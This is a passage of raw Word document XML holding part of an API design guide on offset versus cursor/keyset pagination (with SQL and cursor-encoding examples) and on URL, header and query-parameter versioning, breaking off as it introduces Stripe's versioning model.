    <w:p w14:paraId="2C75256A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Performance degrades linearly with page number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25292E8C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EB7EEF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Data consistency: item inserted at position 5 while paginating:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60717B00" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Page 1: returns items 1-20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C88A994" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      (item inserted at position 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DE9944" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Page 2: returns items 22-41 (item 21 skipped, item 5 seen again)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AA7AF9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3CA847" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28109585" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F44CE2F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      "data": [...],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA6A3C3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "pagination": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE53CA4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        "page": 5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31544063" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        "limit": 20,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0836E385" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        "total_items": 1543,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC318B8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        "total_pages": 78</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2398158D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7F795F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615FFF5C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="3AD4620F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Cursor/keyset pagination (production-grade):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C2BA09" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GET /orders?after=cursor_xyz&amp;limit=20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4967A3EA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28082E23" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Cursor encodes: last seen item's sort key value (e.g., (created_at, id))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDEC9C2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EEF788" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  SQL: SELECT * FROM orders </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9B175E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       WHERE (created_at, id) &gt; ('2024-01-15 10:30:00', 789)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDC2765" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       ORDER BY created_at ASC, id ASC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E03B03" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       LIMIT 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5044BC74" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FE8A39" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Cursor generation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B09B5F9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    last_item = result[-1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9708AB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    cursor = base64_encode(json({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433461A9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "created_at": last_item.created_at.isoformat(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B936C8E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "id": last_item.id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B86D75" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4C1498" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    → "eyJjcmVhdGVkX2F0IjogIjIwMjQtMDEtMTVUMTA6MzA6MDAiLCAiaWQiOiA3ODl9"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BEE50F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7666421E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0378A7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C386CF8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "data": [...],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB938D0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "pagination": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC571C8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        "next_cursor": "eyJjcmVhdGVkX2F0Ij...",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AAE6EB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        "has_more": true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07697029" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73007D81" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DBA8EF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ECC865" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Performance: uses index on (created_at, id) → O(log N) regardless of page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD08FFF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Consistency: stable cursor → no skip/duplicate despite concurrent inserts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B312A84" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7838CD9C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Limitation: cannot jump to arbitrary page (only next/previous)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3634DAB3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">              (this is acceptable for most UIs — infinite scroll doesn't need arbitrary pages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B6D6C7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="155A4A4A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Seek method (for sorting by non-unique fields):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E0C2FD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Sort by price, break ties with id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A5300A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    WHERE (price, id) &gt; ($last_price, $last_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C30B816" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ORDER BY price ASC, id ASC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741316A1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B581B65" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Works: even when multiple items have same price (stable ordering via id tiebreaker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1FC3BE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Versioning — the contract evolution problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A4FF87" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEBBE07" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>URL path versioning (most common, most pragmatic):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE5E02C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  /v1/users, /v2/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D5B25A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2813A5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Pros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F865877" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Explicit in logs, router, middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFC9790" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Easy to route: v1 → old service, v2 → new service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084F29FC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Clients explicitly choose version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600A64A3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Can run both versions simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C3B4FC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3402CD03" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Cons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7FBF08" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Breaks REST "resource location" principle (same resource, different URLs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D09908" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Proliferates routes (/v1/x, /v1/y, /v1/z, /v2/x, /v2/y, /v2/z...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8B9CCC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Clients must update all URLs on version bump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590B3698" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3A420F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  When to version:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C04EEF3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Breaking change: remove field, rename field, change field type, change behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244FAE48" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Non-breaking: add optional field, add new endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDDB702" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Additive-only changes don't need new version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C279B5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC3CE27" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Header versioning (API-key-based):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C866E3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Accept: application/vnd.example.v2+json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771FFF8F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Or: X-API-Version: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219BFCC6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783CFA17" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Pros: URL stays stable (same resource, same URL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56532D1B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Cons: invisible in logs without parsing headers, hard to test in browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF63C40" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34723C1E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Query parameter versioning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D790EB6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GET /users?api_version=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48361E5B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F375269" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Pros: easy to test, visible in logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68617FAD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Cons: pollutes every URL, clients must add to all requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6C0183" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82ED7B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Versioning strategy recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DD814B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  URL versioning for major versions (v1 → v2: breaking changes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B5EC98" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Field additions: backward-compatible, no version bump needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C424E98" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Deprecation: sunset header indicates when version retires</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE1314" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Sunset: Sat, 01 Jan 2026 00:00:00 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABEDBC0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Deprecation: Mon, 01 Jan 2024 00:00:00 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67014DC2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3810F2BB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Stripe's versioning model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3CAEF2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Each API key has a pinned version (date-based: 2024-01-15)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1070E7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
